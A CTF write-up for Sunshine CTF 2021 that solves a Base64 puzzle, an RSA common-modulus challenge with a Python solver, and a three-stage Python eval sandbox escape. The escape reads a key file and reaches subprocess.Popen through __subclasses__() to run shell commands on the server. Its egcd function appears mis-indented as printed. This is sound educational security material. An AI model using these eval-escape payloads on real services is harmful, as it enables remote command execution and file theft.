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Sunshine CTF 2021

This is the sixth year of Sunshine CTF organized by Knightsec a.k.a Hack@UCF. I had moved on to Sunshine CTF after trying out the Peanut Butter JAR CTF held on the same day. This also meant I was able to attempt only a few select challenges for which the solutions are discussed below.

It had two check flags to acquaint us with the flag format. One was available in the discord channel #announcements as sun{dont_u_love_work_from_home} and another was part of the liveness test challenge instructions as sun{flag_to_check_if_you_are_alive}. These establish that all flags are of the format sun{...}.

Challenge list

  1. Mr Robot 🤖
  2. Multiple exponents 🔮
  3. Procrastinator Programmer 🥱

Mr Robot 🤖


This was a very simple challenge to start with which mainly required only our exposure to different types of encoding schemes. The challenge instructions is the only thing we had to work with.

Challenge instructions:

What I’m about to tell you c3Vue2 is top secret. A conspiracy hlbG bigger than all of us. There’s a powerful group of people out there that are secretly running the world.
I’m talking about the xvX3dv guys no one knows about, the ones that are invisible.
The top 1% of the top 1%, the cmxk guys that play God without permission.
And now I think they’re fQ== following me.

The only difference in the above and the one seen in the actual challenge description is that I have highlighted the relevant parts above.

On initially reading through the instructions, the last part which includes fQ== gave me a clear impression that it is the last part of a Base 64 encoding. This is because the character = in this encoding scheme is a padding token.

With the above background on re-reading the instructions all the highlighted pieces was clear to be part of the encoded text. Gathering all the parts and assembling in the order they appear in the instructions we get the encoded text as c3Vue2hlbGxvX3dvcmxkfQ==. Base64 decoding using any of the online tools we get the flag as sun{hello_world}.

Multiple exponents 🔮


This was a good Cryto challenge which brought out the vulnerability of having common modulus for multiple users and using individual exponents for encrypting the same message. The same would be clear to you once you finish reading this write up.

We are provided with the below challenge instructions and a script file which gives us the details of the encryption and the cipher text obtained by both Alice and Bob. The file is included as a code block below.

Challenge instructions:

Both Alice and Bob share the same modulus, but with different exponents. If only there was some
way I could recover this message that was sent to both of them.

Click here to view
from Crypto.Util.number import getPrime
from sunshine_secrets import FLAG

p = getPrime(512)
q = getPrime(512)
assert p != q
n = p * q
phi = (p-1) * (q-1)

e1 = getPrime(512)
e2 = getPrime(512)

d1 = pow(e1, -1, phi)
d2 = pow(e2, -1, phi)

f = int(FLAG.encode("utf-8").hex(), 16)

c1 = pow(f, e1, n)
c2 = pow(f, e2, n)

print({"n": n, "e1": e1, "e2": e2, "c1": c1, "c2":c2})

Here is the output.
    "n": 86683300105327745365439507825347702001838360528840593828044782382505346188827666308497121206572195142485091411381691608302239467720308057846966586611038898446400292056901615985225826651071775239736355509302701234225559345175968513640372874437860580877571155199027883755959442408968543666251138423852242301639,
    "e1": 11048796690938982746152432997911442334648615616780223415034610235310401058533076125720945559697433984697892923155680783661955179131565701195219010273246901,
    "e2": 9324711814017970310132549903114153787960184299541815910528651555672096706340659762220635996774790303001176856753572297256560097670723015243180488972016453,
    "c1": 84855521319828020020448068809384113135703375013574055636013459151984904926013060168559438932572351720988574536405041219757650609586761217385808427001020204262032305874206933548737826840501447182203920238204769775531537454607204301478815830436609423437869412027820433923450056939361510843151320837485348066171,
    "c2": 54197787252581595971205193568331257218605603041941882795362450109513512664722304194032130716452909927265994263753090021761991044436678485565631063700887091405932490789561882081600940995910094939803525325448032287989826156888870845730794445212288211194966299181587885508098448750830074946100105532032186340554

From the above it is clear that we are provided with the modulus n, exponents of Alice and
Bob e1 & e2, cipher texts of Alice and Bob c1 & c2.

As the exponents are large I did not have much confidence in using the RsaCtfTool and rightly so, the tool was not able to exploit with the available details. Also, as we have details of two members, I did slowly realize that this had something to do with the Math behing the modulo cryptography.

So I started reading articles on such exploits and came across various exploit articles handling similar challenges. One such article is here which explained the Mathematical vulnerability clearly. Another excellent article that I came across is here.

Now that the Math behind it is clear, we go ahead to apply the same to our inputs. It is clear that we need to find one value for each exponent such that the sum of the pairwise product of the exponent and the value is equal to the GCD of both the exponents.

The GCD of the exponents can be verified using sympy.gcd. The below script finds the values for each of e1 and e2, followed by computing the flag.

Click here for
import gmpy2
from Crypto.Util.number import long_to_bytes

def egcd(a, b):
    if a == 0:
        return (b, 0, 1)
        g, y, x = egcd(b % a, a)
        return (g, x - (b // a) * y, y)

e1 = 11048796690938982746152432997911442334648615616780223415034610235310401058533076125720945559697433984697892923155680783661955179131565701195219010273246901
e2 = 9324711814017970310132549903114153787960184299541815910528651555672096706340659762220635996774790303001176856753572297256560097670723015243180488972016453
gcd, a, b = egcd(e1, e2)
print("GCD =", gcd)
print("a =", a)
print("b =", b)

n = 86683300105327745365439507825347702001838360528840593828044782382505346188827666308497121206572195142485091411381691608302239467720308057846966586611038898446400292056901615985225826651071775239736355509302701234225559345175968513640372874437860580877571155199027883755959442408968543666251138423852242301639
c1 = 84855521319828020020448068809384113135703375013574055636013459151984904926013060168559438932572351720988574536405041219757650609586761217385808427001020204262032305874206933548737826840501447182203920238204769775531537454607204301478815830436609423437869412027820433923450056939361510843151320837485348066171
c2 = 54197787252581595971205193568331257218605603041941882795362450109513512664722304194032130716452909927265994263753090021761991044436678485565631063700887091405932490789561882081600940995910094939803525325448032287989826156888870845730794445212288211194966299181587885508098448750830074946100105532032186340554

c2_inv = pow(c2, b, n)
c1 = pow(c1, a, n)

cp = c1 * c2_inv % n
print("message_long =", cp)
print("message =", long_to_bytes(cp))

As seen below the execution of the above script directly gives us the required flag sun{d0n7_d0_m0r3_th4n_0ne_3xp0n3nt}.

More than one exponent execution

Procrastinator Programmer 🥱


It was a really well structured challenge that brought out the vulnerabilities in Python eval and exec statements. It is necessary that you first go through the Python documentation linked for each of them.

The main difference is that eval only allows expressions to be evaluated where as exec allows execution of multi line code. With this background and the challenge instructions below we connect to the given web url and port using netcat.

Challenge instructions:

I may have procrastinated. This may be a mistake. Or mistakes were made.
I may have procrastinated security for

I may have been watching too many Tom Cruise movies instead of releasing this… uh… last year. But don’t worry! The keys to the kingdom are split into three parts… you’ll never find them all!

Flag will be given by our backend in the standard sun{} format, but make sure you put all the pieces together!

Need help on your math? If so? ProcrastinatorProgrammer is your buddy! Send equations our way, and we’ll solve them your way!

Example Usages
Send an equation, like
cos(5) + sin(7)
and we’ll send an answer! In this case, 0.9406487841820153.

Need more complicated equations? No problem! Our python3 backend can handle anything you throw at it. fsum([.1, .1, .1, .1, .1, .1, .1, .1, .1, .1]) + gcd(19,29,39,49,59,69) =>2.0

Note: In the future we may disable components if we find there’s security issues with them.

To initially test whether eval or exec is used we supply a payload with line separator characters in them. As this fails and also prints the exact eval conditions used, we see that the eval statement does not restrict usage of any functions from the Python builtins.

Also the details given by the server is shown below:

└─$ nc 65000
Welcome to the ProcrastinatorProgrammer backend.  
Please give me an equation! Any equation! I need to be fed some data to do some processing!  
I'm super secure, and can use all python! I just use `eval()` on your data and then whamo,  
python does all the work!Whatever you do, don't look at my ./key!  

Give me an equation please!

The above clearly indicates that we need to somehow exploit the vulnerability in the usage of eval command to read the ./key file. Given that builtins module is not restricted it is really easy to do. We can use the below payload to read the file and spill the details as the file open method is part of the builtins module.


On sending this payload to this level, we get the below response:


If you completed part 1 of the challenge...

Your princess is in another castle! 🔥🏰🔥 65001 holds your next clue.

So clearly the first part of the flag is sun{eval_is and we need to move on to the next level, in the new url. On connecting to this server we are greeted with the below message that asks us to enter the previous levels partial flag. Once done we can enter our expression to be evaluated.

└─$ nc 65001
Welcome to the ProcrastinatorProgrammer backend.
Please give me an equation! Any equation! I need to be fed some data to do some processing!Due 
to technical difficulties with the last challenge, I've upped my ante! Now I know it's secure!  

I'm super secure, and can use most python math!  
I just use `eval(client_input, \{\}, safe_math_functions)` on your data and then whamo, python  
does all the work!Whatever you do, don't look at my ./key!

Halt in the name of the law!

What was the ./key found in the previous challenge?

Give me an equation please!

The greeting message shows us clearly that an empty dict is used for the second parameter of the eval method. This is no different than sending None for the parameter which means we can use an almost similar payload.

This time I used the payload below and got the subsequent response.

print(open("./key", "r").read())

If you completed part 2 of the challenge...

You need sequels. MORE SEQUELS!! 🔥🏰🔥 65002 holds your next clue.

This again was very clearly some middle part of the flag and so I proceeded to the final level. On connecting to this level we are greeted with the below message:

└─$ nc 65002
Welcome to the ProcrastinatorProgrammer backend.
Please give me an equation! Any equation! I need to be fed some data to do some processing!  
Due to technical difficulties with the previous set, I had to remove math lib support!  

In fact the only thing this can do is add and subtract now!... I think. Google tells me that  
it's secure now! Well the second result anyhow.  

I'm super secure, and can use a bit of python math!  
I just use `eval(client_input, {'__builtins__':\{\}})` on your data and then whamo, python  
does all the work!Whatever you do, don't look at my ./key!

Halt in the name of the law!

What was the ./key found in the previous challenge?

Give me an equation please!

This level was a bit challenging and required a more complicated payload as the builtins module was restricted. This meant any of the default Python functions were not available. However, there would necessarily be some imports used in this level’s code.

There can surely be vulnerable modules which can be exploited via eval. Also to find the classes and modules in the import we can use the payload ().__class__.__base__.__subclasses(). This lists all the classes loaded as part of this code. We find that the subprocess.Popen class is available which can be used to run any OS commands on the shell.

└─$ nc 65002
Welcome to the ProcrastinatorProgrammer backend.  
Please give me an equation! Any equation! I need to be fed some data to do some processing!  

Due to technical difficulties with the previous set, I had to remove math lib support! 
In fact the only thing this can do is add and subtract now!... I think. Google tells me that  
it's secure now! Well the second result anyhow.I'm super secure, and can use a bit of python math!  

I just use `eval(client_input, {'__builtins__':\{\}})` on your data and then whamo, python  
does all the work!Whatever you do, don't look at my ./key!

Halt in the name of the law!

What was the ./key found in the previous challenge?

Give me an equation please!

[<class 'type'>, <class 'weakref'>, <class 'weakcallableproxy'>, <class 'weakproxy'>,
<class 'int'>, <class 'bytearray'>, <class 'bytes'>, <class 'list'>, <class 'NoneType'>, 
<class 'NotImplementedType'>, <class 'traceback'>, <class 'super'>, <class 'range'>, 
<class 'dict'>, ....  
<class 'warnings.WarningMessage'>, <class 'warnings.catch_warnings'>, 
<class 'contextlib.ContextDecorator'>, <class 'contextlib._GeneratorContextManagerBase'>, 
<class 'contextlib._BaseExitStack'>, <class 'subprocess.CompletedProcess'>, 
<class 'subprocess.Popen'>, <class 'multiprocessing.util.Finalize'>, 
<class 'multiprocessing.util.ForkAwareThreadLock'>, <class 'multiprocessing.popen_fork.Popen'>]

As said before the availability of the subrocess.Popen class is more than enough for us to run OS commands like cat ./key to read and print the contents back to us.

As we have this knowledge we carefully craft the below payload to do exactly the same as mentioned above and get the subsequent response.

<Popen: returncode: None args: ['cat', './key']>
If you completed part 3 of the challenge...

 just sum the three clues together to get the flag. It's a three-part equation, very complicated.

I would like to explain the various parts of the payload above. Let us take it part by part:

() - current instance
__class__ - called on current instance returns its class object
__base__ - returns the base object of the class stored as an attribute in __class__
__subclasses__() - invokes the subclasses method which returns an array of classes loaded

From the output of __subclasses__() we find that subprocess.Popen class is returned as the fourth object from the last in the array. So we use the index -4. Also it is not necessary to only use this object. There might be other objects which also allow us to read the required data which can also be used by changing the appropriate indices and subsequent methods used from the chosen class.

As we chose the subprocess.Popen class we invoke the __init__ implicitly by instantiating it with the () along with the required args that form the array of command followed by their arguments.

The effective execution is of the cat ./key in the shell of the server that is running this level.

Thus we have the third part of our flag which is only_if_you_ast_whitelist_first}. Putting the three together our final full flag is sun{eval_is_safe_only_if_you_ast_whitelist_first}.

A capture of the whole exploit in action can be seen below.

Eval vulnerability exploit solve

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Page last modified: 20 Sep, 2021 at 12:58 AM .